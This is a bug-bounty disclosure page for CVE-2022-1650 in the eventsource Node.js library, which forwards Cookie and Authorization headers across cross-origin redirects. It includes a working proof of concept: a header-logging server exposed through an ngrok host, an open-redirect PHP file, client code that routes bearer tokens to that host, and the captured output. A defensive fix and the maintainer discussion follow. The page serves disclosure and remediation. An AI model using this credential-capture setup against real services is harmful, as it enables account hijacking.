URL: https://huntr.dev/bounties/dc9e467f-be5d-4945-867d-1044d27e9b8e/
Submission: On May 23 via api from US — Scanned from DE


EXPOSURE OF SENSITIVE INFORMATION TO AN UNAUTHORIZED ACTOR IN
EVENTSOURCE/EVENTSOURCE


> Reported on Feb 6th 2022 | Timothee Desurmont

Vulnerability type: CWE-200


BUG

Cookies & Authorisation headers are leaked to external sites.


DESCRIPTION

When fetching a URL that redirects to an external site, the user's Cookie and
Authorization headers are re-sent to the third-party application. Under the
same-origin policy, these headers should be sanitized (dropped) before a
cross-origin redirect is followed.


PROOF OF CONCEPT

 1. Start a nodejs server (attacker):

    // Receiving server for the demonstration: logs every request header it
    // is sent and answers 200 with an empty body.
    const express = require('express')
    const app = express()

    app.get('/', function (req, res) {
        console.log(req.headers);
        res.status(200).send()
    })

    app.listen(3000)
    console.log('listening on port 3000');


 2. Launch ngrok (attacker):

ngrok http 3000
Session Status                online
Account                       Timothee Desurmont (Plan: Free)
Update                        update available (version 2.3.40, Ctrl-U to update)
Version                       2.3.35
Region                        United States (us)
Web Interface                 http://127.0.0.1:4040
Forwarding                    http://cb45-92-98-215-185.ngrok.io -> http://localhost:3000
Forwarding                    https://cb45-92-98-215-185.ngrok.io -> http://localhost:3000

Connections                   ttl     opn     rt1     rt5     p50     p90
                              1       0       0.00    0.00    8.92    8.92

HTTP Requests
-------------

GET /                          200 OK


 3. Add a redirect.php file in /var/www/html (mysite):

    <?php
    // Redirects the client to whatever URL the query string names; this
    // stands in for any page on mysite that can send the client off-site.
    $redirect_url = $_GET['url'];
    header("Location: " . $redirect_url);


 4. Run the code below (mysite):

    const EventSource = require("eventsource")

    const mysite = "http://192.168.2.31";
    const attacker = "http://cb45-92-98-215-185.ngrok.io";

    // Credentials meant for mysite only.
    const options = {
        method: 'GET',
        headers: {
            'Content-Type': 'application/json',
            'Cookie': 'ajs_anonymous_id=1234567890"',
            'Authorization': 'Bearer eyJhb12345abcdef'
        }
    };

    // mysite answers with a redirect to the attacker host; the library follows
    // it and re-sends the headers above to the new origin.
    var es = new EventSource(`${mysite}/redirect.php?url=${attacker}/`, options);

    es.onerror = function (err) {
        if (err && (err.status === 401 || err.status === 403)) {
            console.log('not authorized');
        }
    };


 5. Response received by the attacker:

[nodemon] starting `node server.js`
listening on port 3000
{
    host: 'cb45-92-98-215-185.ngrok.io',
    accept: 'text/event-stream',
    authorization: 'Bearer eyJhb12345abcdef',
    'cache-control': 'no-cache',
    'content-type': 'application/json',
    cookie: 'ajs_anonymous_id=1234567890"',
    'x-forwarded-for': '92.98.215.185',
    'x-forwarded-proto': 'http',
    'accept-encoding': 'gzip' 
}



CONSEQUENCE

Access Control: hijack of the victim's account.

The attacker can capture the user's credentials (session cookie and bearer
token) and then replay them against the legitimate web site.


SUGGESTED FIX

If the redirect target's origin differs from the origin of the original URL,
the Authorization and Cookie headers should be removed from the request before
the redirect is followed.
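As an added example, not the eventsource project's code and not the patch that was merged for this report, the Node.js check below implements the suggested fix and the same-origin point made in the description: resolve the Location header against the request URL (it may be relative), compare origins (scheme, host and effective port), and drop the Authorization and Cookie headers only when the redirect leaves the original origin. The function names and the `requestHeaders` object are constructed for this illustration; the host names are the ones from the proof of concept above.

```javascript
// Added example: credential-stripping policy for HTTP redirects.
// Not the eventsource library's code; function names are constructed.

// Header names that must never accompany a request to a different origin.
// Compared case-insensitively because callers may pass them in any case.
const CREDENTIAL_HEADERS = ['authorization', 'cookie'];

// Two URLs share an origin when scheme, host and effective port all match.
// URL.origin already folds default ports away, so "http://a.example" and
// "http://a.example:80" compare equal, while https -> http does not.
function isSameOrigin(fromUrl, toUrl) {
  return new URL(fromUrl).origin === new URL(toUrl).origin;
}

// Given the URL that was requested, the Location header it returned and the
// headers that were sent, return the absolute redirect target plus the
// headers that may be re-sent to it. Credentials survive only same-origin hops.
function headersForRedirect(requestUrl, locationHeader, headers) {
  const target = new URL(locationHeader, requestUrl).href;
  if (isSameOrigin(requestUrl, target)) {
    return { target, headers: { ...headers }, stripped: [] };
  }
  const kept = {};
  const stripped = [];
  for (const [name, value] of Object.entries(headers)) {
    if (CREDENTIAL_HEADERS.includes(name.toLowerCase())) {
      stripped.push(name);
    } else {
      kept[name] = value;
    }
  }
  return { target, headers: kept, stripped };
}

// Constructed sample: the headers the proof of concept attaches for mysite.
const requestHeaders = {
  'Content-Type': 'application/json',
  Cookie: 'ajs_anonymous_id=1234567890',
  Authorization: 'Bearer eyJhb12345abcdef',
};

// Cross-origin redirect (the report's scenario): credentials are dropped.
const crossOrigin = headersForRedirect(
  'http://192.168.2.31/redirect.php',
  'http://cb45-92-98-215-185.ngrok.io/',
  requestHeaders
);

// Same-origin redirect with a relative Location: everything is kept.
const sameOrigin = headersForRedirect(
  'http://192.168.2.31/redirect.php',
  '/stream',
  requestHeaders
);

console.log('cross-origin ->', crossOrigin.target, 'stripped:', crossOrigin.stripped);
console.log('same-origin  ->', sameOrigin.target, 'stripped:', sameOrigin.stripped);
```

The comparison is deliberately on the full origin rather than on the host name alone: a redirect from `https://` to `http://` on the same host is a different origin and also loses the credentials, which is the conservative choice for a bearer token or session cookie.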


OCCURRENCES

eventsource.js L32-L311

We are processing your report and will contact the eventsource team within 24 hours. (4 months ago)
Timothee Desurmont modified the report (4 months ago)
Timothee Desurmont modified the report (4 months ago)
We created a GitHub Issue asking the maintainers to create a SECURITY.md (4 months ago)

Timothee Desurmont (Researcher) commented 23 days ago

--------------------------------------------------------------------------------

Hi @Admin, any update on above report?

Jamie Slome (Admin) commented 22 days ago

--------------------------------------------------------------------------------

I've dropped a comment on the GitHub Issue here. Fingers crossed we get a
response soon! 🤞

Espen Hovlandsdal validated this vulnerability 13 days ago

Thanks for reporting - I have a pull request with a fix awaiting review from the
other maintainers: https://github.com/EventSource/eventsource/pull/271

Timothee Desurmont has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Timothee Desurmont (Researcher) commented 13 days ago

--------------------------------------------------------------------------------

Hi Espen, thanks for validating the report. I am glad to hear that you already
have a fix. If needed I can also submit a PR to patch the code (just let me know
by dropping a message below) 😊

Timothee Desurmont submitted a patch (13 days ago)

Timothee Desurmont (Researcher) commented 13 days ago

--------------------------------------------------------------------------------

submitted the patch just in case...

Espen Hovlandsdal confirmed that a fix has been merged on 10ee0c 11 days ago
Espen Hovlandsdal has been awarded the fix bounty
eventsource.js#L32-L311 has been validated
Matan Borenkraout commented 7 days ago

--------------------------------------------------------------------------------

I think that this one is also fixed in version 1.1.1 based on this commit. Am I
mistaken here? Thanks!

Espen Hovlandsdal (Maintainer) commented 3 days ago

--------------------------------------------------------------------------------

You are correct, yes.

CVE ID: CVE-2022-1650 (published)
Vulnerability Type: CWE-200: Exposure of Sensitive Information to an Unauthorized Actor
Severity: High (8.1)
Visibility: Public
Status: Fixed

Found by: Timothee Desurmont (@sampaguitas, unranked)

Fixed by: Espen Hovlandsdal (@rexxars, maintainer)

This report was seen 445 times.

2022 © 418sec



